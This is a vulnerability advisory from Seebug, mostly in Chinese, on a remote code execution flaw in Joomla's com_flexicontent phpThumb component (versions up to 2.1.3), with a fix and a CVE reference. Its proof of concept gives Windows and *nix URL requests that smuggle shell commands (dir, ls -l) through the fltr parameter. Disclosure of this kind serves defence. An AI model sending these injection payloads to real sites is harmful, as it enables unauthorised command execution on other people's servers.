Joomla com_flexicontent远程代码执行漏洞

2014-01-0800:00:00

Root

www.seebug.org

0.011 Low

EPSS

Percentile

84.8%

JSON

Joomla是一款内容管理系统。

该漏洞是包含在com_flexicontent包中的phpthumb已知漏洞，参数被传递到“ImageMagickThumbnailToGD”时，在"SafeExec"函数被利用。
0
Joomla com_flexicontent <=2.1.3
目前厂商暂无提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.joomla.org/


                                                *----*
*POC:*

*Windows-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&amp;fltr[]=blur|9
-quality  75 -interlace line fail.jpg jpeg:fail.jpg %26%26 dir  %26%26
&amp;phpThumbDebug=9

*nix-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&amp;fltr[]=blur|9
-quality  75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l ;
&amp;phpThumbDebug=9

*----*
*Fix:*

Replace the phpthumb package being used with the latest version.

*----*
*References:*
http://www.cvedetails.com/cve/CVE-2010-1598/

*----*
Warm Regards,
Deepankar Arora and Rafay Baloch
RHA Infosec

0.011 Low

EPSS

Percentile

84.8%

JSON

Related for SSV:61307